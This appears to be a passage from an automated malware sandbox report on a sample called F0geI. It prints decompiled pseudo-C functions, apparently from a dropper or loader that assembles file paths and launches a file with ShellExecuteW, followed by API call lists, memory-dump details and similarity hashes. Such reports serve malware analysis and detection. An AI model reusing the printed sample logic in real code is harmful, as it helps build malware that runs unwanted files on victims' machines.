                                                                                                                                                                        						}
                                                                                                                                                                        						_t21 = _t97 + 2; // 0x407c02
                                                                                                                                                                        						_t218 = _t21;
                                                                                                                                                                        						_v24 = _t218;
                                                                                                                                                                        						_t108 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
                                                                                                                                                                        						_t137 = _t108;
                                                                                                                                                                        						_v20 = _t137;
                                                                                                                                                                        						_t219 =  *((intOrPtr*)( *0x40e18c))(_t218,  *0x40e364);
                                                                                                                                                                        						if(_t219 == 0) {
                                                                                                                                                                        							L28:
                                                                                                                                                                        							LocalFree(_v8);
                                                                                                                                                                        							LocalFree(_v12);
                                                                                                                                                                        							LocalFree(_t199);
                                                                                                                                                                        							LocalFree(_v16);
                                                                                                                                                                        							goto L29;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t221 = _t219 - _v24 >> 1;
                                                                                                                                                                        						if(E0040A3E4(_v24,  &_v20, 0, _t219 - _v24 >> 1) == 0) {
                                                                                                                                                                        							_t137 = _v20;
                                                                                                                                                                        							goto L28;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t142 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
                                                                                                                                                                        						_push(0x208);
                                                                                                                                                                        						_push(_t142);
                                                                                                                                                                        						_push(_v20);
                                                                                                                                                                        						if( *((intOrPtr*)( *0x40e15c))() != 0) {
                                                                                                                                                                        							_t222 = E0040A503(_t142, _v24 + 2 + _t221 * 2);
                                                                                                                                                                        							_t122 =  *((intOrPtr*)( *0x40e044))(0x40, 0x209);
                                                                                                                                                                        							_t183 = 8;
                                                                                                                                                                        							_t123 = E0040A05F(_t122, _t183);
                                                                                                                                                                        							_t143 = _t123;
                                                                                                                                                                        							_push(_t222);
                                                                                                                                                                        							_v28 = _t123;
                                                                                                                                                                        							if( *((short*)(_t222 +  *((intOrPtr*)( *0x40e08c))() * 2 - 2)) != 0x5c) {
                                                                                                                                                                        								_t188 =  *0x40e258; // 0x6d5af8
                                                                                                                                                                        								_t222 = E0040A503(_t222, _t188);
                                                                                                                                                                        							}
                                                                                                                                                                        							_t142 = E0040A503(E0040A503(E0040A503(_t222, _t143), "."), _v16);
                                                                                                                                                                        							_t128 =  *0x40e374; // 0x6ee640
                                                                                                                                                                        							_v24 = _t128;
                                                                                                                                                                        							_t223 = E00408619( &_v24);
                                                                                                                                                                        							if(E00408495(_v12, _t223, _t142) != 0) {
                                                                                                                                                                        								ShellExecuteW(0, 0, _t142, 0, 0, 0);
                                                                                                                                                                        							}
                                                                                                                                                                        							LocalFree(_v28);
                                                                                                                                                                        							LocalFree(_t223);
                                                                                                                                                                        						}
                                                                                                                                                                        						LocalFree(_t142);
                                                                                                                                                                        						LocalFree(_v20);
                                                                                                                                                                        						goto L24;
                                                                                                                                                                        					}
                                                                                                                                                                        					LocalFree(_t137);
                                                                                                                                                                        					goto L39;
                                                                                                                                                                        				}
                                                                                                                                                                        			}














































                                                                                                                                                                        0x004073dc
                                                                                                                                                                        0x004073e0
                                                                                                                                                                        0x0040776a
                                                                                                                                                                        0x0040776e
                                                                                                                                                                        0x004073e6
                                                                                                                                                                        0x004073e8
                                                                                                                                                                        0x004073ed
                                                                                                                                                                        0x004073fe
                                                                                                                                                                        0x0040740c
                                                                                                                                                                        0x0040740f
                                                                                                                                                                        0x00407414
                                                                                                                                                                        0x00407418
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407423
                                                                                                                                                                        0x00407433
                                                                                                                                                                        0x0040775e
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040775e
                                                                                                                                                                        0x00407447
                                                                                                                                                                        0x00407452
                                                                                                                                                                        0x00407460
                                                                                                                                                                        0x00407463
                                                                                                                                                                        0x00407468
                                                                                                                                                                        0x0040746c
                                                                                                                                                                        0x0040775b
                                                                                                                                                                        0x0040774d
                                                                                                                                                                        0x0040774d
                                                                                                                                                                        0x00407762
                                                                                                                                                                        0x00407762
                                                                                                                                                                        0x00407768
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407769
                                                                                                                                                                        0x00407477
                                                                                                                                                                        0x00407487
                                                                                                                                                                        0x00407758
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407758
                                                                                                                                                                        0x0040749b
                                                                                                                                                                        0x004074a6
                                                                                                                                                                        0x004074b4
                                                                                                                                                                        0x004074b7
                                                                                                                                                                        0x004074bc
                                                                                                                                                                        0x004074c0
                                                                                                                                                                        0x00407743
                                                                                                                                                                        0x00407744
                                                                                                                                                                        0x0040774d
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040774d
                                                                                                                                                                        0x004074cb
                                                                                                                                                                        0x004074db
                                                                                                                                                                        0x00407740
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407740
                                                                                                                                                                        0x004074ef
                                                                                                                                                                        0x004074fa
                                                                                                                                                                        0x00407508
                                                                                                                                                                        0x0040750b
                                                                                                                                                                        0x00407510
                                                                                                                                                                        0x00407514
                                                                                                                                                                        0x00407732
                                                                                                                                                                        0x00407735
                                                                                                                                                                        0x00407727
                                                                                                                                                                        0x00407727
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407727
                                                                                                                                                                        0x0040751f
                                                                                                                                                                        0x00407530
                                                                                                                                                                        0x0040772f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040772f
                                                                                                                                                                        0x00407536
                                                                                                                                                                        0x0040753c
                                                                                                                                                                        0x0040753f
                                                                                                                                                                        0x00407547
                                                                                                                                                                        0x0040754d
                                                                                                                                                                        0x004076a0
                                                                                                                                                                        0x004076a6
                                                                                                                                                                        0x004076ad
                                                                                                                                                                        0x004076b3
                                                                                                                                                                        0x004076c3
                                                                                                                                                                        0x004076c3
                                                                                                                                                                        0x004076b3
                                                                                                                                                                        0x004076c9
                                                                                                                                                                        0x004076c9
                                                                                                                                                                        0x004076cc
                                                                                                                                                                        0x004076cd
                                                                                                                                                                        0x004076d6
                                                                                                                                                                        0x004076dd
                                                                                                                                                                        0x004076e6
                                                                                                                                                                        0x004076fc
                                                                                                                                                                        0x00407700
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407706
                                                                                                                                                                        0x00407553
                                                                                                                                                                        0x0040755a
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407560
                                                                                                                                                                        0x00407560
                                                                                                                                                                        0x0040756f
                                                                                                                                                                        0x00407572
                                                                                                                                                                        0x00407580
                                                                                                                                                                        0x00407583
                                                                                                                                                                        0x00407588
                                                                                                                                                                        0x0040758c
                                                                                                                                                                        0x0040770b
                                                                                                                                                                        0x0040770e
                                                                                                                                                                        0x00407717
                                                                                                                                                                        0x0040771e
                                                                                                                                                                        0x00407727
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407727
                                                                                                                                                                        0x0040759b
                                                                                                                                                                        0x004075a9
                                                                                                                                                                        0x00407708
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407708
                                                                                                                                                                        0x004075c3
                                                                                                                                                                        0x004075c5
                                                                                                                                                                        0x004075ca
                                                                                                                                                                        0x004075cb
                                                                                                                                                                        0x004075d2
                                                                                                                                                                        0x004075ee
                                                                                                                                                                        0x004075f7
                                                                                                                                                                        0x004075fb
                                                                                                                                                                        0x004075fe
                                                                                                                                                                        0x00407609
                                                                                                                                                                        0x0040760b
                                                                                                                                                                        0x0040760c
                                                                                                                                                                        0x00407617
                                                                                                                                                                        0x00407619
                                                                                                                                                                        0x00407626
                                                                                                                                                                        0x00407626
                                                                                                                                                                        0x00407647
                                                                                                                                                                        0x0040764c
                                                                                                                                                                        0x00407651
                                                                                                                                                                        0x0040765c
                                                                                                                                                                        0x00407669
                                                                                                                                                                        0x00407673
                                                                                                                                                                        0x00407673
                                                                                                                                                                        0x0040767c
                                                                                                                                                                        0x00407683
                                                                                                                                                                        0x00407683
                                                                                                                                                                        0x0040768a
                                                                                                                                                                        0x00407693
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407693
                                                                                                                                                                        0x00407762
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407762

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,00407C00), ref: 004073FE
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00407C00), ref: 00407762
                                                                                                                                                                          • Part of subcall function 0040A3E4: LocalAlloc.KERNEL32(00000040,00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A40C
                                                                                                                                                                          • Part of subcall function 0040A3E4: LocalFree.KERNEL32(00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A449
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,00407C00), ref: 00407452
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,00407C00), ref: 004074A6
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,00407C00), ref: 004074FA
                                                                                                                                                                        • ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00407673
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 0040767C
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00407C00), ref: 00407683
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00407C00), ref: 0040768A
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 00407693
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
                                                                                                                                                                          • Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
                                                                                                                                                                          • Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
                                                                                                                                                                          • Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550
                                                                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000000), ref: 004076C3
                                                                                                                                                                        • LocalFree.KERNEL32(00407C00,?,?,?,?,?,?,00407C00), ref: 004076CD
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 004076D6
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 004076DD
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 004076E6
                                                                                                                                                                        • LocalFree.KERNEL32(00407C00,?,?,?,?,?,?,00407C00), ref: 0040770E
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 00407717
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 0040771E
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 00407727
                                                                                                                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,00407C00), ref: 00407735
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00407C00), ref: 00407744
                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,00407C00), ref: 0040774D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$Free$Alloc$ExecuteShelllstrlen$Global
                                                                                                                                                                        • String ID: @n$open
                                                                                                                                                                        • API String ID: 4025529775-1430286545
                                                                                                                                                                        • Opcode ID: 8cc9a7fa14e8f1167f43eb2d1b354a71b99967cdcb35b4072c78224b2d76d3d9
                                                                                                                                                                        • Instruction ID: c37f464f11a496ac5bed0fa78998882daeccb467a6fdaf8c4272b4e6ddd95f6a
                                                                                                                                                                        • Opcode Fuzzy Hash: 8cc9a7fa14e8f1167f43eb2d1b354a71b99967cdcb35b4072c78224b2d76d3d9
                                                                                                                                                                        • Instruction Fuzzy Hash: 54A1FA72E00215AFDB149BA6DE84D7E7BB5EB44310B004835E905F73A1DB78BD11CBAA
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                                                        			E00404F7E(void* __ecx, short* __edx) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				void* _v20;
                                                                                                                                                                        				signed int _v24;
                                                                                                                                                                        				void* _v28;
                                                                                                                                                                        				void* _v32;
                                                                                                                                                                        				void* _v36;
                                                                                                                                                                        				signed int _v40;
                                                                                                                                                                        				short* _v44;
                                                                                                                                                                        				void* _v48;
                                                                                                                                                                        				signed int _v52;
                                                                                                                                                                        				char _v56;
                                                                                                                                                                        				signed int _t60;
                                                                                                                                                                        				void* _t62;
                                                                                                                                                                        				void* _t71;
                                                                                                                                                                        				void* _t78;
                                                                                                                                                                        				void* _t85;
                                                                                                                                                                        				void* _t94;
                                                                                                                                                                        				signed int _t103;
                                                                                                                                                                        				void* _t109;
                                                                                                                                                                        				void* _t111;
                                                                                                                                                                        				void* _t112;
                                                                                                                                                                        				void* _t115;
                                                                                                                                                                        				char _t116;
                                                                                                                                                                        				void* _t117;
                                                                                                                                                                        				void* _t127;
                                                                                                                                                                        				void* _t140;
                                                                                                                                                                        				signed int _t142;
                                                                                                                                                                        				void* _t144;
                                                                                                                                                                        				signed int _t146;
                                                                                                                                                                        				void* _t165;
                                                                                                                                                                        				void* _t173;
                                                                                                                                                                        				signed int _t177;
                                                                                                                                                                        				void* _t178;
                                                                                                                                                                        				void* _t180;
                                                                                                                                                                        				void* _t182;
                                                                                                                                                                        				void* _t184;
                                                                                                                                                                        				void* _t187;
                                                                                                                                                                        				void* _t188;
                                                                                                                                                                        				signed int _t193;
                                                                                                                                                                        				signed int _t197;
                                                                                                                                                                        				void* _t199;
                                                                                                                                                                        				void* _t202;
                                                                                                                                                                        
                                                                                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                                                                                        				_t142 = 0;
                                                                                                                                                                        				_v44 = __edx;
                                                                                                                                                                        				_v40 = _v40 & 0;
                                                                                                                                                                        				_t60 =  *((intOrPtr*)( *0x40e18c))(__ecx,  *0x40e39c);
                                                                                                                                                                        				_t177 = _t60;
                                                                                                                                                                        				if(_t177 == 0) {
                                                                                                                                                                        					return _t60 | 0xffffffff;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t178 = _t177 + 0xc;
                                                                                                                                                                        				_t62 =  *((intOrPtr*)( *0x40e18c))(_t178,  *0x40e1f0);
                                                                                                                                                                        				if(_t62 == 0) {
                                                                                                                                                                        					L5:
                                                                                                                                                                        					_v8 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t178, _t188) + _t64);
                                                                                                                                                                        					if(E0040A3E4(_t178,  &_v8, 0, _t142) != 0) {
                                                                                                                                                                        						_t180 = _t178 + _t142 * 2 + 2;
                                                                                                                                                                        						_t71 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t180) + _t69);
                                                                                                                                                                        						_v12 = _t71;
                                                                                                                                                                        						_t193 =  *((intOrPtr*)( *0x40e18c))(_t180,  *0x40e20c) - _t180 >> 1;
                                                                                                                                                                        						if(E0040A3E4(_t180,  &_v12, 0, _t193) != 0) {
                                                                                                                                                                        							_t182 = _t180 + _t193 * 2 + 2;
                                                                                                                                                                        							_t78 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t182) + _t76);
                                                                                                                                                                        							_v16 = _t78;
                                                                                                                                                                        							_t197 =  *((intOrPtr*)( *0x40e18c))(_t182,  *0x40e20c) - _t182 >> 1;
                                                                                                                                                                        							if(E0040A3E4(_t182,  &_v16, 0, _t197) != 0) {
                                                                                                                                                                        								_t184 = _t182 + _t197 * 2 + 2;
                                                                                                                                                                        								_t85 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t184) + _t83);
                                                                                                                                                                        								_push( *0x40e228);
                                                                                                                                                                        								_v20 = _t85;
                                                                                                                                                                        								_push(_t184);
                                                                                                                                                                        								if(E0040A3E4(_t184,  &_v20, 0,  *((intOrPtr*)( *0x40e18c))() - _t184 >> 1) != 0) {
                                                                                                                                                                        									_t199 =  *((intOrPtr*)( *0x40e044))(0x40, 0x4000);
                                                                                                                                                                        									_v28 = _t199;
                                                                                                                                                                        									_t94 =  *((intOrPtr*)( *0x40e044))(0x40, 0x20a);
                                                                                                                                                                        									_push(0);
                                                                                                                                                                        									_t144 = _t94;
                                                                                                                                                                        									_push(0x1a);
                                                                                                                                                                        									_push(_t144);
                                                                                                                                                                        									_push(0);
                                                                                                                                                                        									if( *((intOrPtr*)( *0x40e0c4))() != 0) {
                                                                                                                                                                        										_push(_v12);
                                                                                                                                                                        										_push(_t144);
                                                                                                                                                                        										_push(_t144);
                                                                                                                                                                        										if( *((intOrPtr*)( *0x40e000))() != 0) {
                                                                                                                                                                        											_v40 = 1;
                                                                                                                                                                        											E004052DA(_t144, _t144, _v8, _v16, _v20, _t199,  &_v24);
                                                                                                                                                                        											if(_v24 > 0) {
                                                                                                                                                                        												_t109 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        												_t111 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        												_t173 = 0x10;
                                                                                                                                                                        												_t112 = E0040A05F(_t109, _t173);
                                                                                                                                                                        												_t202 = _t112;
                                                                                                                                                                        												_v48 = _t202;
                                                                                                                                                                        												_t115 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t111,  *0x40e210), _t202);
                                                                                                                                                                        												_v52 = _v52 & 0x00000000;
                                                                                                                                                                        												_v36 = _t115;
                                                                                                                                                                        												_t116 =  *0x40e204; // 0x6d5b78
                                                                                                                                                                        												_v56 = _t116;
                                                                                                                                                                        												_t117 = E00408619( &_v36);
                                                                                                                                                                        												_v32 = _t117;
                                                                                                                                                                        												_t187 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
                                                                                                                                                                        												_t165 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t202, 0xffffffff, 0, 0, 0, 0);
                                                                                                                                                                        												if(_t165 == 0) {
                                                                                                                                                                        													_t199 = _v28;
                                                                                                                                                                        												} else {
                                                                                                                                                                        													_t127 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t202, 0xffffffff, _t187, _t165, 0, 0);
                                                                                                                                                                        													_t199 = _v28;
                                                                                                                                                                        													if(_t127 != 0) {
                                                                                                                                                                        														E00407EDB(_v44, _t187, 0, 0, _v24, _t199, _v32,  &_v56);
                                                                                                                                                                        													}
                                                                                                                                                                        												}
                                                                                                                                                                        												LocalFree(_t187);
                                                                                                                                                                        												LocalFree(_v32);
                                                                                                                                                                        												LocalFree(_v36);
                                                                                                                                                                        												LocalFree(_v48);
                                                                                                                                                                        											}
                                                                                                                                                                        										}
                                                                                                                                                                        									}
                                                                                                                                                                        									LocalFree(_v8);
                                                                                                                                                                        									LocalFree(_v12);
                                                                                                                                                                        									LocalFree(_v16);
                                                                                                                                                                        									LocalFree(_v20);
                                                                                                                                                                        									LocalFree(_t144);
                                                                                                                                                                        									LocalFree(_t199);
                                                                                                                                                                        									_t103 = _v40;
                                                                                                                                                                        									L23:
                                                                                                                                                                        									return _t103;
                                                                                                                                                                        								}
                                                                                                                                                                        								LocalFree(_v8);
                                                                                                                                                                        								LocalFree(_v12);
                                                                                                                                                                        								LocalFree(_v16);
                                                                                                                                                                        								LocalFree(_v20);
                                                                                                                                                                        								_push(0xfffffffa);
                                                                                                                                                                        								L13:
                                                                                                                                                                        								_pop(_t103);
                                                                                                                                                                        								goto L23;
                                                                                                                                                                        							}
                                                                                                                                                                        							LocalFree(_v8);
                                                                                                                                                                        							LocalFree(_v12);
                                                                                                                                                                        							LocalFree(_v16);
                                                                                                                                                                        							_push(0xfffffffb);
                                                                                                                                                                        							goto L13;
                                                                                                                                                                        						}
                                                                                                                                                                        						LocalFree(_v8);
                                                                                                                                                                        						LocalFree(_v12);
                                                                                                                                                                        						_push(0xfffffffc);
                                                                                                                                                                        						goto L13;
                                                                                                                                                                        					}
                                                                                                                                                                        					LocalFree(_v8);
                                                                                                                                                                        					_push(0xfffffffd);
                                                                                                                                                                        					goto L13;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t146 = _t62 - _t178;
                                                                                                                                                                        					_t142 = _t146 >> 1;
                                                                                                                                                                        					if(_t146 >= 0) {
                                                                                                                                                                        						goto L5;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t140 = 0xfffffffe;
                                                                                                                                                                        					return _t140;
                                                                                                                                                                        				}
                                                                                                                                                                        			}















































                                                                                                                                                                        0x00404f89
                                                                                                                                                                        0x00404f95
                                                                                                                                                                        0x00404f97
                                                                                                                                                                        0x00404f9a
                                                                                                                                                                        0x00404f9e
                                                                                                                                                                        0x00404fa0
                                                                                                                                                                        0x00404fa4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00404fa6
                                                                                                                                                                        0x00404fb9
                                                                                                                                                                        0x00404fbd
                                                                                                                                                                        0x00404fc1
                                                                                                                                                                        0x00404fd3
                                                                                                                                                                        0x00404fef
                                                                                                                                                                        0x00404ffd
                                                                                                                                                                        0x0040501d
                                                                                                                                                                        0x00405028
                                                                                                                                                                        0x00405030
                                                                                                                                                                        0x00405044
                                                                                                                                                                        0x00405053
                                                                                                                                                                        0x0040507c
                                                                                                                                                                        0x00405087
                                                                                                                                                                        0x0040508f
                                                                                                                                                                        0x004050a3
                                                                                                                                                                        0x004050b0
                                                                                                                                                                        0x004050df
                                                                                                                                                                        0x004050ea
                                                                                                                                                                        0x004050ec
                                                                                                                                                                        0x004050f2
                                                                                                                                                                        0x004050fa
                                                                                                                                                                        0x00405111
                                                                                                                                                                        0x0040514d
                                                                                                                                                                        0x0040515b
                                                                                                                                                                        0x0040515e
                                                                                                                                                                        0x00405160
                                                                                                                                                                        0x00405162
                                                                                                                                                                        0x00405169
                                                                                                                                                                        0x0040516b
                                                                                                                                                                        0x0040516c
                                                                                                                                                                        0x00405172
                                                                                                                                                                        0x00405178
                                                                                                                                                                        0x00405180
                                                                                                                                                                        0x00405181
                                                                                                                                                                        0x00405186
                                                                                                                                                                        0x0040518f
                                                                                                                                                                        0x004051a5
                                                                                                                                                                        0x004051b1
                                                                                                                                                                        0x004051c4
                                                                                                                                                                        0x004051d0
                                                                                                                                                                        0x004051d4
                                                                                                                                                                        0x004051d9
                                                                                                                                                                        0x004051e4
                                                                                                                                                                        0x004051ec
                                                                                                                                                                        0x004051f5
                                                                                                                                                                        0x004051fa
                                                                                                                                                                        0x00405201
                                                                                                                                                                        0x00405204
                                                                                                                                                                        0x00405209
                                                                                                                                                                        0x0040520c
                                                                                                                                                                        0x00405216
                                                                                                                                                                        0x00405224
                                                                                                                                                                        0x0040523a
                                                                                                                                                                        0x0040523e
                                                                                                                                                                        0x0040527b
                                                                                                                                                                        0x00405240
                                                                                                                                                                        0x00405254
                                                                                                                                                                        0x00405256
                                                                                                                                                                        0x0040525b
                                                                                                                                                                        0x00405271
                                                                                                                                                                        0x00405276
                                                                                                                                                                        0x0040525b
                                                                                                                                                                        0x0040527f
                                                                                                                                                                        0x00405288
                                                                                                                                                                        0x00405291
                                                                                                                                                                        0x0040529a
                                                                                                                                                                        0x0040529a
                                                                                                                                                                        0x004051b1
                                                                                                                                                                        0x00405186
                                                                                                                                                                        0x004052a3
                                                                                                                                                                        0x004052ac
                                                                                                                                                                        0x004052b5
                                                                                                                                                                        0x004052be
                                                                                                                                                                        0x004052c5
                                                                                                                                                                        0x004052cc
                                                                                                                                                                        0x004052d2
                                                                                                                                                                        0x004052d5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004052d5
                                                                                                                                                                        0x00405116
                                                                                                                                                                        0x0040511f
                                                                                                                                                                        0x00405128
                                                                                                                                                                        0x00405131
                                                                                                                                                                        0x00405137
                                                                                                                                                                        0x00405139
                                                                                                                                                                        0x00405139
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405139
                                                                                                                                                                        0x004050b5
                                                                                                                                                                        0x004050be
                                                                                                                                                                        0x004050c7
                                                                                                                                                                        0x004050cd
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004050cd
                                                                                                                                                                        0x00405058
                                                                                                                                                                        0x00405061
                                                                                                                                                                        0x00405067
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00405067
                                                                                                                                                                        0x00405002
                                                                                                                                                                        0x00405008
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00404fc3
                                                                                                                                                                        0x00404fc5
                                                                                                                                                                        0x00404fc7
                                                                                                                                                                        0x00404fc9
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00404fcd
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00404fcd

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: x[m
                                                                                                                                                                        • API String ID: 0-3488577920
                                                                                                                                                                        • Opcode ID: 8864805a19a7b6f1c9d7069d355c260c6df1b2e51c1f69a765a566e797a01f6c
                                                                                                                                                                        • Instruction ID: a5171e7b5a3df4f463689049ce4a04ed549f9b8857e4f558dcc9ab38b60404ef
                                                                                                                                                                        • Opcode Fuzzy Hash: 8864805a19a7b6f1c9d7069d355c260c6df1b2e51c1f69a765a566e797a01f6c
                                                                                                                                                                        • Instruction Fuzzy Hash: 06A1C371A00215AFDB009BEADE45EAE7BB5EF48310F104535F614F72E0DBB86D218B69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • __inc.LIBCMTD ref: 00420F8C
                                                                                                                                                                        • _isdigit.LIBCMTD ref: 00420FB2
                                                                                                                                                                        • ___check_float_string.LIBCMTD ref: 00421012
                                                                                                                                                                        • __inc.LIBCMTD ref: 00421030
                                                                                                                                                                        • _isdigit.LIBCMTD ref: 004210E2
                                                                                                                                                                        • ___check_float_string.LIBCMTD ref: 00421142
                                                                                                                                                                        • ___check_float_string.LIBCMTD ref: 004210C9
                                                                                                                                                                          • Part of subcall function 004216A0: __nh_malloc_dbg.LIBCMTD ref: 004216FD
                                                                                                                                                                        • __inc.LIBCMTD ref: 0042108D
                                                                                                                                                                          • Part of subcall function 00421800: __filbuf.LIBCMTD ref: 00421841
                                                                                                                                                                        • ___check_float_string.LIBCMTD ref: 004211D6
                                                                                                                                                                        • __inc.LIBCMTD ref: 004211F4
                                                                                                                                                                        • ___check_float_string.LIBCMTD ref: 00421237
                                                                                                                                                                        • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004215A6
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.456441129.0000000000412000.00000020.00000001.01000000.00000006.sdmp, Offset: 00412000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_412000_F0geI.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ___check_float_string$__inc$Locale_isdigit$UpdateUpdate::~___filbuf__nh_malloc_dbg
                                                                                                                                                                        • String ID: +
                                                                                                                                                                        • API String ID: 1483831053-2126386893
                                                                                                                                                                        • Opcode ID: c35f91d167e3a57fa736c0f9cbc30fc036796ab7872d9175b5daee21bb42ebbd
                                                                                                                                                                        • Instruction ID: 47227cab4d599e2255cfe454b9df9279d6ecde979f53f72c50d2db3852e4d8b6
                                                                                                                                                                        • Opcode Fuzzy Hash: c35f91d167e3a57fa736c0f9cbc30fc036796ab7872d9175b5daee21bb42ebbd
                                                                                                                                                                        • Instruction Fuzzy Hash: 46F194B1E002699BCF24CF99DC80AEEB775BF54304F54819ED81AA7312D7399A80CF55
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • _wcscpy_s.LIBCMTD ref: 004244FD
                                                                                                                                                                          • Part of subcall function 00419280: __errno.LIBCMTD ref: 004192D4
                                                                                                                                                                        • __invoke_watson_if_error.LIBCMTD ref: 00424506
                                                                                                                                                                        • __invoke_watson_if_error.LIBCMTD ref: 0042457D
                                                                                                                                                                        • __errno.LIBCMTD ref: 004245B2
